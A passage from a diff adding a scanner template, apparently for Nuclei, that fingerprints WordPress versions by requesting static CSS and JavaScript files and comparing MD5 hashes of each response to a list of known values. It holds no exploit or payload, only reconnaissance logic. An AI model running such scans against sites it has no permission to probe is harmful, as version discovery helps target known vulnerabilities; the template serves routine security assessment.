md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"f949b90ca61d747d51f7620b9a5d5ba1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b958b610e6358da9cfffc37e1c158094\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dashboard.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7ccec58847924e84dfefdd0d25cea2af\" == md5(body))" + - type: dsl + name: 4.4 - 4.7.19 + dsl: + - "(\"e6aee15ae7cbc39c41e0caa2e93ef635\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"2d4f9155e6121a9caa6eb3d6f8c31e5d\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.2 + dsl: + - "(\"dcaf4f687c6c523cf0e2d5515234faa5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"aeb3ae0f646c3afc88078de88e318c87\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"4d169faec906ab2d91fb44abce00fd44\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"e0e87cf173989432bb55a610b0482fa7\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"fa45887a7cdd1c59785925aee26f900c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8d1ca3bf59b5e3b0ea34b07e721089ea\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"63f5a605e2f478c7f0c1c1f79a88429d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"3a144712f35d9aca773bf97d94d5ecaf\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f5351bd03456d17223b4a5d358b2544a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"358cfef8c91e5323297ec1b2ea9cb98b\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.9.2 + dsl: + - "(\"2c8218cfd143404d332975abed1aa569\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"581b9ca830642beef916bcd39d089e4b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2abb58f46ab0b5d7d86670731ecf3862\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9271890ed60cd3e49b8a561767999e4c\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"31b5f0bb77a13841a2812360f12b3ba6\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"de72cf9420ffc4fbef47ecc53877faea\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"0df88c30eb7ac52b400b1f2121002f91\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"385a8df73ba0f3b70758893a16a6c571\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"4e3940567475109556544a82ae81ce16\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"2d5ef0d5d3b1951bd406fd6a73a192bc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"51faa672d35571c3c7dc665504c0fee9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style-rtl.min.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4a5dde5e3791a76501821da2b1dfce68\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2820af9602eb1c8443906a9a27d1a819\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"fa9994c1b5de037b9013d1f2ceff882d\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"2bad5ad05fc5e11bac6f5bcf95124a8a\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"fe6ac58ff715c540235e6913dbeb7183\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"0bb01b69a11196ddb298f0d225ccd2c4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"751c42bf4955e40546dee046ce26b44e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style.min.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"09927056d95ca371cbd4d7402b352542\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0e9b74f1a376a273cb1c2c234cba71b0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a877d2f4353f01a9134d8c8ce0db82b4\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"fc060f1d7a3619c63ba1fcba852472e2\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"2259dc170fd1a6bf64025a9e49f4505f\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"1b58e68c6447fdf5d1eccface0d3070a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e67d0efd8ef594b12b1f004c6370753\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"dc94d328ab5cbcadc8e9ef6519fc067d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"a2c05aeb1c11f06a8b3c1bc8888714f9\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"aff1e25a4b4a2e2a46ab7ea46d5b9925\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f74a750f829fc22f3527d4f156353d10\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5f72768681f4c37c485fb8c14f6feb3d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"5a46c32fd25c44db97927a28bcb170b3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"55285802152cbf7f33740342b5cf5f0e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"86da19a9b131b04a7fe12d38c592ed37\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a433160974de4f9d1cde24cce1c4622c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"769b39e7aec2b06bb29df3323657c334\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"7d0b6b870a3a7e548e1eb870d88c4c81\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"4077bbaddd5b0afec30d0465dfee9a1f\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"030a9d648605161b8ef79df87680f810\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d6d55a8ea4e14a6fdaa3612a728610c9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e7db3dff78abd65e4da012736a676c63\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"163adcbf68e5c0db8fdf677ea303ec5a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"61762f9b3cf69c62702ea3978b8d684f\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"c92591680afc89977dc066e1c372a122\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"181250fab3a7e2549a7e7fa21c2e6079\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9ea3eba803004cf0fd6fa54f113fc2eb\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d4848bf7a74b8f06572006f03b22d8df\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"7d543e6dd3df8e177a96af4edd405cd4\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5dce0296f703eff6dbf67e7ed1222938\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"84cc3efbc68b9c92cca44a90175faae2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"caa38ff10ed1507e35313b9a72f66c22\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2a85ae0041f1e0eb49d4a7774808e79a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"26316cf9639d7b0deeb5e123ffe79a5c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"5fc6ab945e28c3ec1018d27359fc6fe0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"86d3b37483ebfc6abed73502569760c7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5f236bd826c48e91ff253382c5c37aa1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"c3363dc9b45a2e183ff4743110e0649c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"0f976bf7efaf94fab3099a544671bf06\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"d3266344ddb105a2e774a071dd05a361\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d314bef52d4210718abf723a84c0db97\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4e458ab9194119cf29d195398952278e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6a34c3bf655032a55972f1acb0deedda\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"ee11d0961a70a281fffdd478bab3db99\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"03fe2a02684af9dd3c05d206434700ee\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"eff1f0418baf497fee10aa9421cc7766\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"d9fd1cc345d88a5f0d0ae8ed7b5ffe0d\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"aaa89661c610c9d3be7bf098cbd81d9d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"942abacb51c51c46a7b2eab718b50ff4\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"a87557e7840940783e60c7877e2a1799\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ee7b6faa39b4daacb9803c8f28f3e07a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"944fa1911d43313855e89ef1a548fe59\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d6fc2524d57ebc083b7ff7537e224da0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f236f953d732ffea81874f232246a427\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"bc513df8fca4987536f8469d24b211ea\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5bc61e4d6b4a02f424ab9f4847627294\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"44049d0e74af137633cef06a3d528c2a\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"c23ed53f65d2a33b09841652d534cc5d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"dd459e1742a3926a3675f688d0ef92da\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"4755410b4d7c1cd67fa2dc22c02366e7\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"cb3f33976b5285736dc20089d664cad7\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"aef837640e1f39eb578e3bb898e3fe2c\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"422e9259e974a8b75dc5ced61527a267\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"8aaac8c45315f80ce0f534516d595f7f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"30620103fe7264b628191d45ba5cc39c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8dd847f3f9e6dd3b55c7116fbb88ed5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b66d358a3f46de1f57cbee6e570e934c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"985b33c3a44691c0e59b3b40dd5df611\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e8e736e802c339955e0473f66df03997\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"cf3c105be573bef08e81acc2005563bc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"bbd4cf6151b6cb6aef0069f21c974bd1\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"b83ae3ac7bf56384bccae35bd754330f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"48d54770a01d9bfda2cf1d474fe33ce8\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"426ba484cd1e0d2f58f8c4abd314ced8\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"93a88efe33eee0f63d3514a8523c50e2\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"aca80e48284d65eb3bfa545286c6bb93\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"6c820a224fb1b62424c77cefc7f61f1a\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"043de378600b0c2ac4125573d8099a48\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"a7677a0b2c154416be1bb8cedf4ac135\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"832d0ae59a42ef007ab959fc5a9847ad\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tinymce.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"86265897eb6b6dd76f6d2a0a90c8420e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"8f1e10e7c01e44db33c5003d897eaf85\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"bb16520a021ae170a7019675f2f5f81f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7d3d06f33331b3a08222df679ab2c8fe\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"a2ec23124a2989f2a773d65ad1bdf37d\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"bae0e7d1036a75aeaed6461677f39adc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"36fb296e63f7d054a7695d40916004f9\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"8dbe59343ccc14e1c3be2204e4c68c6a\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"7fd549b2340d5da4b05e27f16655ce3c\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"df2f5a1e56af39b9ec1b4e2e7bf6d08b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"a1410c5a4e18cf08544136bcf0fbfddd\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f3b51c46d7be402a753613d97c68cfd0\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b6c6f8d469f55960e57d0a268adb3601\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f2ddb16f20361a33a873d2516fc90686\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"db400ecef923dd0e45a03a8efe9e024e\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"cc1033054aede513d5bb550bf85ecc6e\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"ad598feb4b2b6ce0c38d86f89d2f3970\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"e0cc75e46e7be9cda3c4da2a12e6e2f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"500c07cb726ab6a03c8cfd154414e9d7\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"40b86d22b39ba7ebb195a9fe7d10ff28\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"f89b18422c3a2b2e95315dd5b7eabe8e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2476454ed291bdd96a14c4b7f08ab5bc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"586ce1e095c0f8b0cca1439fcefe6b6e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dashicons.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"cf3c0e8f26fe2025a0f22138ffe30d53\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5f672f4380c60d6d7d67604e55aa0e7b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e65f96d4f5227b3b03c118b731b6f921\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"5515b659e6fa1b563d7d57287dea2e4e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"519c5cad73fa9de0f11b7e78479e7599\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"c659db821f14019f9974e62313535cfa\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3b6d61cac9d02c4ee20bb87f5caab26e\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"515214365da656a845777ddbdc04ee2a\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"c2566febd39864bf4abe0ebebd0f147d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"1c364e777cd2b874ea6cf09100861c6c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"800e28274109388380449140e310f8bb\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"abe89a302a6cd8111574788f7cd3a0d7\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.4.4 + dsl: + - "(\"c8956481e00463f838b45364f45756df\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d2678bbfdb083928cabb16f0b85d0f1c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d5e6ce5103b482fe0a2d355d003e9ffd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dashicons.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"cbd78303f0ab99bcf4470575b0f8a7ea\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"091c14c103750ded6e7ded49df51a98d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"a6907bc29f0d2dcf9a44bf4a56bceca4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7d009b6317b016a7d127de92c3a0c905\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b3cf8e531a9c15bb7952877a43a5cd64\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a5cc9931638552cae57f9c701fd8f776\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6a5c4ff8a9f11b2344e05fe1318ac520\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"cf2aec29e53cf7fcfeed958de2b1aec7\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"7764b220df0d9356ec51b6946533c7ac\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"5d6b5071186dbd3e8af754f6a013ba18\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"363ed44b087adae1c3fd9231f8fe79d2\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"def33a673e34fac8f0b6df1cf4a6c5df\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.4.4 + dsl: + - "(\"aceacf5c4e3295d6dbab9118d672d1e4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4b20f5f54d861ef753f71d48e39e3f80\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2c4af0bbdf2fb60fc46ee752e4bb7ee9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"71e4ef8ec8da9599e176043a5d31e025\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"63af64ba89f768e448bab87ee0cb94da\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"acc2861152c365bbafbfff8ab3baaf55\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"977215a7d6324e9bbd607305187355a1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"84d2cdacbe7a308bea0ed482fc236bb7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ced8cb7d002258e5a711cc0e610b3cf0\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"91ff408d32eacbd28e621c34b7565f8d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"02cb4a48791d540267d3f1bdc7b25a8f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"75344ea8409de819ebc101366c402c11\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f840b18a792635481d3a0e5b8ff55612\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"745ae83cdb88166b48e13f879c600ff7\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"6583418c9dfc4767fd8df8059be75015\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"8488283c909d6b599b0bfc4135c8c885\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"2666a090dd22c66ad83fa1ed000a068a\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"522e0398389b0db63783a3d8d35dd002\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"c5e41c8c4080a281258cba02483eacd2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"edc470548ca17c52be8c94f6fc8b6c86\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"6f9db94ed589ac53ac4f95f7bfd46157\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3ce0fdd54d7109ff5ba425d88509c06b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e3da39b7d64c16ecb4298e483a7c2a74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-health-rtl.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"19991d9e26681ff01629a0cf58651bae\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"7592e3eb7de71932226882365aa3819f\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"e66fa0b23640d556008829f69c9a2d16\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"27c646e3c3864f931729676695034395\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9bf7afac2006b8184971c08d3d246f7c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cc0cc3c4152cc9d4d7b17d2ae725f02f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"452f6383f0d9263dda6b0d5ea88a6db9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-health-rtl.min.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"14f7a6c96c22eef6f02fa918f7c8b6e2\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"2d2ae0d8ae344824615e599729f5ea36\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"ed8b548ceed11d315604c72a57972503\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c61f97d295efa7b259a1c31ed539a06c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"15345e2225ade03956ab276155af29e6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b7dcfb8747c7e5e73feea29e6c4b76d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b5ae779b1a5499ec7b6cb2b41d3f7e63\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-health.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"a815a72dc9c0594be5aaf9cf1b9ce464\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"5eb3454daf100e4be230440daa329ae6\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"c1f0b9a047b6061761580ef3ee214089\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f8ae37763a8ce5880c9b2eb6846ff309\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1539b98902afecd3a677150c6be08723\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6a418be61b03da0ba6d7d5c08311f531\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"244c9df5b8da8e654172b69d05eafed3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-health.min.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"b875bcda0ce59674010c90917c167595\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"69c4f2948081065924089d12e39b1a0a\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"33fb80d8f91159c6b8b86fb219bc4fa8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a64377bb1095c77534632279ece6c742\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3746073895dac1541ea0fd7bbd0e3501\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6e75baa8fa43d1a0850c08805314d8c9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8ff63629a11bdd97ced82973fcab7562\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji-release.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.2 + dsl: + - "(\"af2f44df3198cfda9fd515873696ad00\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"8b90a6e26cce1c0a39bfa8b7e0fe909e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"cb6284b70da03a43468244be7eafa362\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"64d7608a1b81f07f97f87506b87a8a5a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f3789112e7c443dc1d661159005af3e4\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"b22ca0bb06142d867f03bd0d89642997\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.2 + dsl: + - "(\"3f19e615bd0d76b9f3457d0f44d5211b\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"1601e8da361dc8f86caa5afe88e37f5c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1c64b125732c6fe54928ee058ea72595\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"5976e0125334346c7a6211dd341db80e\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"c2e58e292752044c979a4efe494e1299\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"ea188c2a9a5622ddd0451da92900799d\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + 